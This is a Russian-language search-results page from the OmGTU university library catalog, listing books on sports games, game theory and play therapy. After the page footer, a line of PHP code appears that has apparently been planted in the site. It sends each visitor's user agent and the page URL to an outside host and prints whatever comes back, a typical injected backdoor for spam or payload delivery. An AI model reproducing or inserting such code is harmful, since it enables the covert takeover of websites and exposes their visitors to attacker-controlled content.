Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

122 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ИГРОВАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 118
1. 
Нестеровский, Дмитрий Иванович. Баскетбол: Теория и методика обучения [Текст] : учеб. пособие для вузов про специальности 033100 "Физическая культура" / Д. И. Нестеровский, 2007. - 335, [1] с.
Держатели документа (Информация об экземплярах) 

В учебном пособии излагаются общие закономерности процесса обучения навыкам игры в баскетбол, раскрывается технология обучения основам техники, тактики и игровой деятельности. Представленный материал содержит подробное описание всех технических приемов и тактических действий, комплексы дидактических средств и соответствующих организационно-методических указаний, перечень наиболее часто встречающихся ошибок.

Для студентов факультетов физической культуры педагогических вузов. Может быть полезно учителям школ и тренерам по баскетболу.

2. 
"Идентификация систем и задачи управления" [Электронный ресурс] : тр. V междунар. конф., Москва, 30 янв.-2 февр. 2006 г. / Ин-т проблем упр. им. В. А. Трапезникова РАН, 2006. - 1 o=эл. опт. диск (CD-ROM)
Ключевые слова 
ДИНАМИЧЕСКАЯ -- КОМПАКТ-ДИСК -- ЭЛЕКТРОННЫЙ РЕСУРС -- CD-ROM -- СИСТЕМА -- БЕСПРОВОДНАЯ -- СЕТЬ -- СТОХАСТИЧЕСКАЯ -- НЕЛИНЕЙНАЯ -- СИГНАЛ -- АЛГОРИТМ -- ИСКУССТВЕННАЯ -- НЕЙРОННАЯ -- ИЗОБРАЖЕНИЕ -- СВЕТ -- ЭКОЛОГИЧЕСКАЯ -- РАСПОЗНАВАНИЕ -- ОРГАНИЗАЦИОННАЯ -- ИГРОВАЯ -- САМООРГАНИЗАЦИЯ -- ИНФОРМАЦИЯ -- ЛОГИСТИЧЕСКАЯ -- КАЧЕСТВО -- РЕГИОНАЛЬНЫЙ -- РЫНОК -- ТОРГОВАЯ -- ПОЛУМАРКОВСКИЙ -- ПРОЦЕСС -- ФИЛЬТРАЦИЯ -- ФИЛЬТР -- ПОМЕХА -- МАССОВОЕ -- ОБСЛУЖИВАНИЕ -- СЛОЖНАЯ -- ДИАГНОСТИКА -- НАДЕЖНОСТЬ -- НЕИСПРАВНОСТЬ -- ВИБРАЦИЯ -- ДЕФЕКТ -- ПРОГРАММНОЕ -- ОБЕСПЕЧЕНИЕ -- СРЕДСТВО -- ОТЛАДКА -- АСУ ТП -- ИНФОРМАЦИОННАЯ -- БЕЗОПАСНОСТЬ -- МАРШРУТИЗАЦИЯ -- АНАЛИЗАТОР -- ЭЛЕКТРОПРИВОД -- ПОРТАЛЬНЫЙ -- МАНИПУЛЯТОР -- КОНВЕРТЕР -- ПРОКАТКА -- РЕЗОНАТОРНЫЕ -- СВЧ -- МАТЕМАТИЧЕСКОЕ -- МОДЕЛИРОВАНИЕ -- ЛИНЕАРИЗАЦИЯ -- УПРАВЛЕНЧЕСКОЕ -- РЕШЕНИЕ -- ПРИНЯТИЕ -- КОЛЛАПС -- СИСТЕМНЫЙ -- АНАЛИЗ -- ИНТЕЛЛЕКТУАЛЬНЫЙ -- РЕСУРС -- ОШИБКА -- ЭКСПЕРТНАЯ -- ОЦЕНКА
Держатели документа (Информация об экземплярах) 
3. 
Горстко, Александр Борисович. Познакомьтесь с математическим моделированием [Текст] / А. Б. Горстко, 1991. - 157 с.
Держатели документа (Информация об экземплярах) 
4. 
Спиваковская, Алла Семеновна. Психотерапия: игра, детство, семья [Текст]. Т. 1, 2000. - 304 с.
Держатели документа (Информация об экземплярах) 
5. 
Спортивные игры [Текст] : учеб. для вузов по специальности 033100 "Физическая культура" / Ю. Д. Железняк [и др.] ; под ред. Ю. Д. Железняка, Ю. М. Портнова, 2007. - 517, [1] с.

В учебнике излагаются теоретико-методические основы спортивных игр, их роль и место в системе физического воспитания и спорта, в профессиональном физкультурном образовании; представлена методика обучения базовым спортивным играм: волейболу, баскетболу, гандболу, футболу, хоккею, теннису.

Для студентов высших педагогических учебных заведений. Может быть полезен преподавателям, учителям физкультуры и тренерам команд по спортивным играм.

6. 
Бахтин, Владимир Соломонович. Песни ленинградской области [Текст] : записи 1947-1977 гг. / В. С. Бахтин, 1978. - 230, [1] с.
Держатели документа (Информация об экземплярах) 
7. 
Методы и модели в экономике [Текст] : метод. указания к практ. занятиям / ОмГТУ, 2008. - 42 с.
Оглавление 
  • Элементы теории игр. - с.3
  • Игровые модели. - с.3
  • Классификация игр. - с.4
  • Запись матричной игры в виде платежной матрицы. - с.5
  • Нижняя и верхняя цена игры. Решение игры в чистых стратегиях. - с.6
  • Уменьшение порядка платежной матрицы. - с.7
  • Пример решения матричной игры в чистых стратегиях. - с.8
  • Контрольные вопросы и задания. - с.10
  • Задача 1. - с.10
  • Смешанные стратегии в матричных играх. - с.10
  • Графический метод решения игр с матрицами размера 2 x n и m x 2. - с.14
  • Решение матричных игр методами линейного программирования. - с.16
  • Контрольные вопросы и задания. - с.21
  • Задача 2. - с.22
  • Задача 3. - с.23
  • Принятие решения в условиях неопределенности. Статистические игры. - с.25
  • Критерии принятия решений. - с.26
  • Критерий максимального математического ожидания выигрыша. - с.26
  • Критерий недостаточного основания Лапласа. - с.26
  • Максиминный критерий Вальда. - с.27
  • Критерий минимаксного риска Сэвиджа. - с.28
  • Критерий пессимизма-оптимизма Гурвица. - с.28
  • Пример решения статистической игры. - с.30
  • Контрольные вопросы и задания. - с.33
  • Задача 4. - с.34
  • Транспортная задача. - с.34
  • Постановка транспортной задачи. - с.34
  • Построение модели транспортной задачи. - с.35
  • Применение транспортных задач в экономике. - с.40
  • Контрольные вопросы и задания. - с.40
  • Задача 5. - с.41
  • Библиографический список. - с.43

Методические указания предназначены для студентов дневной, вечерней и очно-заочной форм обучения факультета экономики и управления ОмГТУ при выполнении ими самостоятельной работы по изучению курса "Методы и модели в экономике".

Могут быть полезны для самоподготовки с использованием дистанционных технологий.

Полный текст
8. 
Спорт и образ жизни [Текст] : сб. статей / сост.: В. И. Столяров, З. Кравчик, 1979. - 276, [2] с.
Держатели документа (Информация об экземплярах) 
9. 
Барчукова, Галина Васильевна. Настольный теннис [Текст] / Г. В. Барчукова, 1990. - 173, [2] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
10. 
Хасан, Борис Иосифович. Конструктивная психология конфликта [Текст] : Учеб. пособие для вузов по пед. специальностям / Б. И. Хасан, 2003. - 250 с.

В пособии представлены взгляды на проблему и <феноменологию> <конфликта> ведущих психологических школ, а также основные понятия нового <конструктивного подхода>; предложены способы описания и анализа <конфликтных> <ситуаций>. Автор излагает различные подходы к <переговорным> <процессам> в целом, а также к пониманию способов подготовки, организации и <проведения> <переговоров> как основной формы взаимодействия заинтересованных сторон для продуктивного разрешения конфликтов.

Учебное пособие адресовано студентам учреждений высшего профессионального образования, обучающихся по специальности 020400 - Психология и 031000 - Педагогика и психология, аспирантам, преподавателям вузов, специалистам в области организационной и социальной психологии.

11. 
Венгер, Александр Леонидович. Психологические рисуночные тесты [Текст] : Иллюстрир. рук. / А. Л. Венгер, 2004. - 159 с.
12. 
Кэдьюсон, Хайди. Практикум по игровой психотерапии [Текст] / Х. Кэдьюсон, Ч. Шефер; Пер. с англ. А. И. Копытина, 2002. - 415 с.
13. 
Кэдьюсон, Хайди. Практикум по игровой психотерапии [Текст] / Х. Кэдьюсон, Ч. Шефер, 2000. - 415 с.
Держатели документа (Информация об экземплярах) 
14. 
Кэдьюсон, Хайди. Практикум по игровой психотерапии [Текст] / Х. Кэдьюсон, Ч. Шефер; Пер. с англ. А. И. Копытина, 2001. - 415 с.
Держатели документа (Информация об экземплярах) 
15. 
Народная культура Сибири [Текст] : Учеб. пособие / ОмГУ. Ч. 2 / Д. А. Алисов, А. М. Андреев, Е. Я. Аркин и др; отв. ред.: Н. М. Генова, Н. Ф. Хилько, 2002. - 220, [2] с.
Держатели документа (Информация об экземплярах) 

Учебное пособие подготовлено лабораторией региональной народной культуры Сибирского филиала Российского института культурологии и предназначено в качестве регионального компонента для учащихся и студентов по дисциплинам: "Культурология", "Мировая художественная культура", "Народное художественное творчество", "Регионоведение", а также - по специализациям разного профиля в вузах в колледжах культуры в т. ч. и искусства.

Во второй части учебного пособия дается системный анализ региональной народной культуры, устанавливается взаимосвязь региональных и этнических традиций с современными пластами народной культуры на примере народного танца, народной игрушки, декоративно-прикладного искусства, хорового пения, музыкального фольклора, фотографического и кинематографического творчества. Раскрываются особенности деревянного зодчества, народной игры, книжной и мемориальной культуры.

Особое внимание уделяется вопросам этнопедагогики и использованию средств народного творчества для духовного и личностного развития в сфере образовательной и досуговой деятельности.

Работа выполнена при поддержке Федеральной целевой программы "Интеграция высшего образования и фундаментальной науки" (проект Р10132).

16. 
Очков, Валерий Федорович. 24 этюда на Бейсике [Текст] / В. Ф. Очков, Ю. В. Пухначев, 1988. - 175 с.
Держатели документа (Информация об экземплярах) 
17. 
Моховиков, Александр Николаевич. Телефонное консультирование [Текст] : Учеб. пособие по специальностям "Психология", "Клиническая психология" / А. Н. Моховиков, 2001. - 494 с.
Держатели документа (Информация об экземплярах) 

В книге рассматриваются вопросы теории и практики телефонной психологической помощи как особого направления в психологическом консультировании. Особое внимание уделено психотехническим аспектам телефонного консультирования и частным проблемам телефонной помощи.

18. 
Подвижные игры во внеклассной работе общеобразовательной школы [Текст] / В. Ф. Мишенькина, И. А. Рогов, А. А. Гераськин, О. С. Шалаев, 2003. - 108 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии представлены материалы, соответствующие требованиям гос. образовательного стандарта профессионального образования по курсу "Подвижные игры" в высших и средних учебных заведений физической культуры. Изложенные материалы составляют методологическую основу организации досуга учащихся с использованием подвижных игр во внеклассной работе.

Пособие предназначено для студентов вузов физической культуры, факультетов физвоспитания педагогических вузов, тренеров СДЮШОР и преподавателей физической культуры.

19. 
Комиссарова, Людмила Дмитриевна. Социально-психологические технологии в работе современной публичной библиотеки [Текст] : Метод. пособие / Л. И. Комиссарова, 2003. - 149 с.
Держатели документа (Информация об экземплярах) 

Методическое пособие для публичных (ЦБС), юношеских и детских библиотек. Подробно рассматривается роль социально-психологических технологий в современном информационно-культурном пространстве библиотеки. Представлен опыт работы конкретной ЦБС. Приложение содержит методические разработки в помощь практикам: сценарии психологических тренингов, тексты рекламных буклетов, материалы для бесед с детьми и родителями.

20. 
Баркакати, Набайоти. Программирование игр для Windows на Borland C++ [Текст] : [Пер. с англ.] / Н. Баркакати, 1995. - 510 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2961 - 19.07.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.98 с.12 запросов, 0.57c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;